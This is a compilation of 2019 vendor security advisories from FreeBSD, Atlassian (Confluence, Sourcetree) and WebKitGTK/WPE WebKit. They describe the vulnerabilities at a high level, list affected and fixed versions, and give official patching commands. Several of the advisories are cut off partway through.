-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:04.ntpSecurity Advisory The FreeBSD Project Topic: Authenticated denial of service in ntpd Category: contrib Module: ntp Announced: 2019-05-14 Credits:Magnus Stubman Affects:All supported versions of FreeBSD Corrected: 2019-03-07 13:45:36 UTC (stable/12, 12.0-STABLE) 2019-05-14 23:02:56 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-03-07 13:45:36 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:06:26 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2019-8936 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The ntpd(8) daemon is an implementation of the Network Time Protocol (NTP) used to synchronize the time of a computer system to a reference time source. The ntpd(8) daemon uses a protocol called mode 6 to both get status information from the running ntpd(8) daemon and configure it on the fly. This protocol is typically used by the ntpq(8) program, among others. II. Problem Description A crafted malicious authenticated mode 6 packet from a permitted network address can trigger a NULL pointer dereference. Note for this attack to work, the sending system must be on an address from which the target ntpd(8) accepts mode 6 packets, and must use a private key that is specifically listed as being used for mode 6 authorization. III. Impact The ntpd daemon can crash due to the NULL pointer dereference, causing a denial of service. IV. Workaround Use 'restrict noquery' in the ntpd configuration to limit addresses that can send mode 6 queries. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, restart the ntpd service: # service ntpd restart 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch # fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch.asc # gpg --verify ntp.patch.asc [FreeBSD 11.2-RELEASE/11.3-PRERELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch # fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch.asc # gpg --verify ntp-11.2.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart the ntpd service, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r344884 releng/12.0/ r347589 stable/11/r344884 releng/11.2/ r347590 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References http://support.ntp.org/bin/view/Main/SecurityNotice#March_2019_ntp_4_2_8p13_NTP_Rele> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:04.ntp.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTrdfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cLGtw/8CNAYnLxARrMUK1QeC9sE7
Confluence Security Advisory - 2019-04-17
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 This email refers to the advisory found at https://confluence.atlassian.com/x/d5e8OQ . CVE ID: * CVE-2019-3398. Product: Confluence Server and Confluence Data Center. Affected Confluence Server and Confluence Data Center versions: 6.6.0 <= version < 6.6.13 6.7.0 <= version < 6.12.4 6.13.0 <= version < 6.13.4 6.14.0 <= version < 6.14.3 6.15.0 <= version < 6.15.2 Fixed Confluence Server and Data Center versions: * for 6.6.x, Confluence Server 6.6.13 has been released with a fix for this issue. * Confluence Server 6.12.4 has been released with a fix for this issue. * for 6.13.x, Confluence Server 6.13.4 has been released with a fix for this issue. * for 6.14.x, Confluence Server 6.14.3 has been released with a fix for this issue. * for 6.15.x, Confluence Server 6.15.2 has been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability. Versions of Confluence starting with version 2.0.0 before 6.6.13 (the fixed version for 6.6.x), from 6.7.0 before 6.12.4 (the fixed version for 6.12.x), from 6.13.0 before 6.13.4 (the fixed version for 6.13.x), from 6.14.0 before 6.14.3 (the fixed version for 6.14.x), and from 6.15.0 before 6.15.2 are affected by this vulnerability. Customers who have upgraded Confluence to version 6.6.13 or 6.12.4 or 6.13.4 or 6.14.3 or 6.15.2 are not affected. Customers who have downloaded and installed Confluence >= 6.6.0 but less than 6.6.13 (the fixed version for 6.6.x) or who have downloaded and installed Confluence >= 6.7.0 but less than 6.12.4 or who have downloaded and installed Confluence >= 6.13.0 but less than 6.13.4 (the fixed version for 6.13.x) or who have downloaded and installed Confluence >= 6.14.0 but less than 6.14.3 (the fixed version for 6.14.x) or who have downloaded and installed Confluence >= 6.15.0 but less than 6.15.2 (the fixed version for 6.15.x) please upgrade your Confluence installations immediately to fix this vulnerability. Path traversal in the downloadallattachments resource - CVE-2019-3398 Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs, or to create a new space or personal space, or who has 'Admin' permissions for a space, can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. Versions of Confluence starting with version 2.0.0 before 6.6.13 (the fixed version for 6.6.x), from 6.7.0 before 6.12.4 (the fixed version for 6.12.x), from 6.13.0 before 6.13.4 (the fixed version for 6.13.x), from 6.14.0 before 6.14.3 (the fixed version for 6.14.x), and from 6.15.0 before 6.15.2 are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/CONFSERVER-58102 . Fix: To address this issue, we've released the following versions containing a fix: * Confluence Server and Confluence Data Center version 6.6.13 * Confluence Server and Confluence Data Center version 6.12.4 * Confluence Server and Confluence Data Center version 6.13.4 * Confluence Server and Confluence Data Center version 6.14.3 * Confluence Server and Confluence Data Center version 6.15.2 Remediation: Upgrade Confluence to version 6.15.2 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Confluence Server 6.6.x and cannot upgrade to 6.15.2, upgrade to version 6.6.13. If you are running Confluence Server 6.13.x and cannot upgrade to 6.15.2, upgrade to version 6.13.4. If you are running Confluence Server 6.14.x and cannot upgrade to 6.15.2, upgrade to version 6.14.3. For a full description of the latest version of Confluence Server, see the release notes found at https://confluence.atlassian.com/display/DOC/Confluence+Release+Notes. You can download the latest version of Confluence Server from the download centre found at https://www.atlassian.com/software/confluence/download. Support: If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/. -BEGIN PGP SIGNATURE- iQJLBAEBCgA1FiEEXh3qw5vbMx/VSutRJCCXorxSdqAFAly+dZ8XHHNlY3VyaXR5 QGF0bGFzc2lhbi5jb20ACgkQJCCXorxSdqA0SQ//WMRRM5cK9rtS9waf+By0pyNb RKpwqcOVmM9Xuh1gv7D1lJtOC28NcXzGsXNiRQEoAhzkFbNDMDGQ6xcTIzGTr6HR Owgj
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0002
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0002 Date reported : April 10, 2019 Advisory ID : WSA-2019-0002 WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2019-0002.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0002.html CVE identifiers : CVE-2019-6201, CVE-2019-6251, CVE-2019-7285, CVE-2019-7292, CVE-2019-8503, CVE-2019-8506, CVE-2019-8515, CVE-2019-8518, CVE-2019-8523, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544, CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-11070. Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. CVE-2019-6201 Versions affected: WebKitGTK before 2.22.6 and WPE WebKit before 2.22.4. Credit to dwfault working with ADLab of Venustech. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6251 Versions affected: WebKitGTK and WPE WebKit before 2.24.1. Credit to Dhiraj. Processing maliciously crafted web content may lead to spoofing. WebKitGTK and WPE WebKit were vulnerable to a URI spoofing attack similar to the CVE-2018-8383 issue in Microsoft Edge. CVE-2019-7285 Versions affected: WebKitGTK before 2.22.6 and WPE WebKit before 2.22.4. Credit to dwfault working at ADLab of Venustech. Processing maliciously crafted web content may lead to arbitrary code execution. A use after free issue was addressed with improved memory management. CVE-2019-7292 Versions affected: WebKitGTK before 2.22.6 and WPE WebKit before 2.22.4. Credit to Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team. Processing maliciously crafted web content may result in the disclosure of process memory. A validation issue was addressed with improved logic. CVE-2019-8503 Versions affected: WebKitGTK before 2.22.6 and WPE WebKit before 2.22.4. Credit to Linus Särud of Detectify. A malicious website may be able to execute scripts in the context of another website. A logic issue was addressed with improved validation. CVE-2019-8506 Versions affected: WebKitGTK and WPE WebKit before 2.24.0. Credit to Samuel Groß of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. A type confusion issue was addressed with improved memory handling. CVE-2019-8515 Versions affected: WebKitGTK before 2.22.6 and WPE WebKit before 2.22.4. Credit to James Lee, @Windowsrcer. Processing maliciously crafted web content may disclose sensitive user information. A cross-origin issue existed with the fetch API. This was addressed with improved input validation. CVE-2019-8518 Versions affected: WebKitGTK before 2.22.7 and WPE WebKit before 2.22.5. Credit to Samuel Groß of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8523 Versions affected: WebKitGTK before 2.22.7 and WPE WebKit before 2.22.5. Credit to Apple. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8524 Versions affected: WebKitGTK and WPE WebKit before 2.24.0. Credit to G. Geshev working with Trend Micro Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8535 Versions affected: WebKitGTK and WPE WebKit before 2.24.0. Credit to Zhiyang Zeng, @Wester, of Tencent Blade Team. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved state management. CVE-2019-8536 Versions affected: WebKitGTK and WPE WebKit before 2.24.0. Credit to Apple. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2019-8544 Versions affected: WebKitGTK and WPE WebKit before 2.24.0. Credit to an anonymous researcher. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2019-8551 Versions affected: WebKitGTK and WPE WebKit before 2.24.0. Credit to Ryan Pickren, ryanpickren.com. Processing maliciously crafted web content may lead to universal cross site scripting. A logic issue was
Atlassian - Confluence Security Advisory - 2019-03-20
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 This email refers to the advisory found at https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2019-03-20 . CVE ID: * CVE-2019-3395. * CVE-2019-3396. Product: Confluence Server and Confluence Data Center. Affected Confluence Server and Confluence Data Center product versions: 6.6.0 <= version < 6.6.12 6.12.0 <= version < 6.12.3 6.13.0 <= version < 6.13.3 6.14.0 <= version < 6.14.2 Fixed Confluence Server and Confluence Data Center product versions: * for 6.6.x, Confluence Server and Data Center 6.6.12 have been released with a fix for these issues. * for 6.12.x, Confluence Server and Data Center 6.12.3 have been released with a fix for these issues. * for 6.13.x, Confluence Server and Data Center 6.13.3 have been released with a fix for these issues. * for 6.14.x, Confluence Server and Data Center 6.14.2 have been released with a fix for these issues. Summary: This advisory discloses critical severity security vulnerabilities. Versions of Confluence Server and Data Center before 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x) and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are affected by these vulnerabilities. Customers who have upgraded Confluence to version 6.6.12 or 6.12.3 or 6.13.3 or 6.14.2 are not affected. Customers who have downloaded and installed Confluence >= 6.6.0 but less than 6.6.12 (the fixed version for 6.6.x) or who have downloaded and installed Confluence >= 6.12.0 but less than 6.12.3 (the fixed version for 6.12.x) or who have downloaded and installed Confluence >= 6.13.0 but less than 6.13.3 (the fixed version for 6.13.x) or who have downloaded and installed Confluence >= 6.14.0 but less than 6.14.2 (the fixed version for 6.14.x) please upgrade your Confluence installations immediately to fix these vulnerabilities. WebDAV vulnerability (CVE-2019-3395) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: A remote attacker is able to exploit a Server-Side Request Forgery (SSRF) vulnerability via the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance. Versions of Confluence before version 6.6.7 (the fixed version for 6.6.x), from version 6.7.0 before 6.7.3 (the fixed version for 6.7.x), from version 6.8.0 before 6.8.5 (the fixed version for 6.8.x) and from version 6.9.0 before 6.9.3 (the fixed version for 6.9.x) are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/CONFSERVER-57971 . Remote code execution via Widget Connector macro (CVE-2019-3396) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: There was a server-side template injection vulnerability in Confluence via Widget Connector. An attacker is able to exploit this issue to achieve path traversal and remote code execution on systems that run a vulnerable version of Confluence. Versions of Confluence before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x) and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/CONFSERVER-57974 . Fix: To address these issues, we have released the following versions of Confluence Server and Data Center containing a fix: * version 6.6.12 * version 6.12.3 * version 6.13.3 * version 6.14.2 Remediation: Upgrade Confluence Server and Data Center to version 6.14.2 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Confluence Server and or Data Center 6.6.x and cannot upgrade to 6.14.2, upgrade to version 6.6.12. If you are running Confluence Server and or Data Center 6.12.x and cannot upgrade to 6.14.2, to version 6.12.3. If you are running Confluence Server and or Data Center 6.13.x and cannot upgrade to 6.14.2, upgrade to version 6.13.3. For a full description of the latest version of Confluence Server and Data Center, see the release notes found at https://confluence.atlassian.com/display/DOC/Confluence+Release+Notes. You can downl
March 2019 Sourcetree Advisory - Multiple Remote Code Execution Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 This email refers to the advisory found at https://confluence.atlassian.com/display/SOURCETREEKB/Sourcetree+Security+Advisory+2018-03-06 . CVE ID: * CVE-2018-17456. * CVE-2018-20234. * CVE-2018-20235. * CVE-2018-20236. Product: Sourcetree. Affected Sourcetree product versions: 1.2 <= version < 3.1.1 0.5a <= version < 3.0.17 Fixed Sourcetree product versions: * for macOS, Sourcetree 3.1.1 has been released with a fix for these issues. * for Windows, Sourcetree 3.0.17 has been released with a fix for these issues. Summary: This advisory discloses critical severity security vulnerabilities. Versions of Sourcetree are affected by these vulnerabilities. Customers who have upgraded Sourcetree to version 3.1.1 (Sourcetree for macOS) or 3.0.17 (Sourcetree for Windows) are not affected. Customers who have downloaded and installed Sourcetree >= 1.2 but less than 3.1.1 (the fixed version for macOS) or who have downloaded and installed Sourcetree >= 0.5a but less than 3.0.17 (the fixed version for Windows) please upgrade your Sourcetree installations immediately to fix these vulnerabilities. Sourcetree for macOS - Git submodules vulnerability (CVE-2018-17456) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: The embedded version of Git used in Sourcetree for macOS was vulnerable to CVE-2018-17456. An attacker can exploit this issue if they can commit to a Git repository linked in Sourcetree for macOS. This allows them to execute arbitrary code on systems running a vulnerable version of Sourcetree for macOS. Versions of Sourcetree for macOS starting with version 1.2 before version 3.1.1 are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREE-6394 . Sourcetree for Windows - Git submodules vulnerability (CVE-2018-17456) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: The embedded version of Git used in Sourcetree for Windows was vulnerable to CVE-2018-17456. An attacker can exploit this issue if they can commit to a Git repository linked in Sourcetree for Windows. This allows them to execute arbitrary code on systems running a vulnerable version of Sourcetree for Windows. Versions of Sourcetree for Windows starting with version 0.5a before version 3.0.17 are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREEWIN-11292 . Sourcetree for macOS - Mercurial hooks vulnerability (CVE-2018-20234) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: There was an argument injection vulnerability in Sourcetree for macOS via filenames in Mercurial repositories. A remote attacker with permission to commit to a Mercurial repository linked in Sourcetree for macOS is able to exploit this issue to gain code execution on the system. Versions of Sourcetree for macOS starting with version 1.2 before version 3.1.1 are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREE-6391 . Sourcetree for Windows - Mercurial hooks vulnerability (CVE-2018-20235) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: There was an argument injection vulnerability in Sourcetree for Windows via filenames in Mercurial repositories. A remote attacker with permission to commit to a Mercurial repository linked in Sourcetree for Windows is able to exploit this issue to gain code execution on the system. Versions of Sourcetree for Windows starting with version 0.5a before version 3.0.15 are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREEWIN-11289 . Sourcetree for Windows - URI handling vulnerability (CVE-2018-20236) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels
WebKitGTK+ and WPE WebKit Security Advisory WSA-2019-0001
WebKitGTK+ and WPE WebKit Security Advisory WSA-2019-0001 Date reported : February 08, 2019 Advisory ID : WSA-2019-0001 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2019-0001.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0001.html CVE identifiers : CVE-2019-6212, CVE-2019-6215, CVE-2019-6216, CVE-2019-6217, CVE-2019-6226, CVE-2019-6227, CVE-2019-6229, CVE-2019-6233, CVE-2019-6234. Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit. CVE-2019-6212 Versions affected: WebKitGTK+ before 2.22.6 and WPE WebKit before 2.22.4. Credit to an anonymous researcher. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6215 Versions affected: WebKitGTK+ before 2.22.6 and WPE WebKit before 2.22.4. Credit to Lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. A type confusion issue was addressed with improved memory handling. CVE-2019-6216 Versions affected: WebKitGTK+ before 2.22.5 and WPE WebKit before 2.22.3. Credit to Fluoroacetate working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6217 Versions affected: WebKitGTK+ before 2.22.5 and WPE WebKit before 2.22.3. Credit to Fluoroacetate working with Trend Micro's Zero Day Initiative, Proteas, Shrek_wzw, and Zhuo Liang of Qihoo 360 Nirvan Team. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6226 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Apple. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6227 Versions affected: WebKitGTK+ before 2.22.5 and WPE WebKit before 2.22.3. Credit to Qixun Zhao of Qihoo 360 Vulcan Team. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2019-6229 Versions affected: WebKitGTK+ before 2.22.5 and WPE WebKit before 2.22.3. Credit to Ryan Pickren. Processing maliciously crafted web content may lead to universal cross site scripting. A logic issue was addressed with improved validation. CVE-2019-6233 Versions affected: WebKitGTK+ before 2.22.4 and WPE WebKit before 2.22.2. Credit to G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2019-6234 Versions affected: WebKitGTK+ before 2.22.4 and WPE WebKit before 2.22.2. Credit to G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. We recommend updating to the latest stable versions of WebKitGTK+ and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases. Further information about WebKitGTK+ and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/. The WebKitGTK+ and WPE WebKit team, February 08, 2019
FreeBSD Security Advisory FreeBSD-SA-19:02.fd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:02.fd Security Advisory The FreeBSD Project Topic: File description reference count leak Category: core Module: unix Announced: 2019-02-05 Credits:Peter Holm Affects:FreeBSD 12.0 Corrected: 2019-02-05 17:56:22 UTC (stable/12, 12.0-STABLE) 2019-02-05 18:11:15 UTC (releng/12.0, 12.0-RELEASE-p3) 2019-02-05 17:57:30 UTC (stable/11, 11.2-STABLE) CVE Name: CVE-2019-5596 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background UNIX-domain sockets are used for inter-process communication. It is possible to use UNIX-domain sockets to transfer rights, encoded as file descriptors, to another process. II. Problem Description FreeBSD 12.0 attempts to handle the case where the receiving process does not provide a sufficiently large buffer for an incoming control message containing rights. In particular, to avoid leaking the corresponding descriptors into the receiving process' descriptor table, the kernel handles the truncation case by closing descriptors referenced by the discarded message. The code which performs this operation failed to release a reference obtained on the file corresponding to a received right. This bug can be used to cause the reference counter to wrap around and free the file structure. III. Impact A local user can exploit the bug to gain root privileges or escape from a jail. IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +30 "Rebooting for security update" 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch # fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch.asc # gpg --verify fd.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r343785 releng/12.0/ r343790 stable/11/r343786 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5596> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:02.fd.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlxZ1YFfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cK7+w/+JeFIVM0QQC1R4wJFmT3bBaRumxGCx5PN5Ufe7ub/ztwsKQKJeps1aiS3 fzw3Ck1K7+joeG+cNwZNihmAyEa2Hgk+FDhQBX531yrwF1jQ2A2oKGfkhs5e02Ng k16MV9pVlNP1zQ3wFVBjFCCvBuVJ0A8XTxALY7ivZlj2edgSH1eL4SaP1mrSD2Xu pR2amN7WkAaIqvATK0VkWjYp6kUXtI8CBtdP3hpKz88rpYoZfWxupqtghnxgjIqt iuTOhbemvYuBvB+ErbtU/6Z4ffoHt9Csrk2MM56/RZRwyHmtC4CFqtxClrUpOoa2 2OcEbR8cZyEardSES78UBjbTwlOTVd5F4o86Q1bKytHjI72ycB5yKZkyiHmdJCjs EhlaDC/rnHxdYGvBuiLqFcNU5tJiGawZZwyozCQz67dGD89QzKQurKEWQ1YJvMsW ZwwJRSHrllUyJQBdqV/R3Qoaz2koeE9633jtqHDdUYKCZAgeFdic/6u9r4Rx2Nj5 JpTZU01bwvxNZPf35WbI2L+JbygR40b3FYbZ3skBqZylp+EkPGPxGpHGAxdKWeOy rzGBukIuWnLy9pmJ574oTZymw8P
FreeBSD Security Advisory FreeBSD-SA-19:01.syscall
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:01.syscallSecurity Advisory The FreeBSD Project Topic: System call kernel data register leak Category: core Module: kernel Announced: 2019-02-05 Credits:Konstantin Belousov Affects:All supported versions of FreeBSD. Corrected: 2019-02-05 17:52:06 UTC (stable/12, 12.0-STABLE) 2019-02-05 18:05:05 UTC (releng/12.0, 12.0-RELEASE-p3) 2019-02-05 17:54:02 UTC (stable/11, 11.2-STABLE) 2019-02-05 18:07:45 UTC (releng/11.2, 11.2-RELEASE-p9) CVE Name: CVE-2019-5595 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The FreeBSD/amd64 architecture defines the SYSCALL instruction for syscalls, and uses registers calling conventions for passing syscalls arguments and return values in addition to the registers usage imposed by the SYSCALL and SYSRET instructions in long mode. In particular, the arguments are passed in registers specified by the C ABI, and the content of the registers specified as caller-save, is undefined after the return from syscall. II. Problem Description The callee-save registers are used by kernel and for some of them (%r8, %r10, and for non-PTI configurations, %r9) the content is not sanitized before return from syscalls, potentially leaking sensitive information. III. Impact Typically an address of some kernel data structure used in the syscall implementation, is exposed. IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10m "Rebooting for security update" 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch # fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch.asc # gpg --verify syscall.patch.asc [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch # fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch.asc # gpg --verify syscall.patch.11.2.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r343781 releng/12.0/ r343788 stable/11/r343782 releng/11.2/ r343789 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5595> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:01.syscall.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlxZ1X9fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKPZBAAlwCVtNNIuq0s8FB9LjLaVJww1WWmbVJbhw1TJyBV2yRCkWwGDLag3dJ0 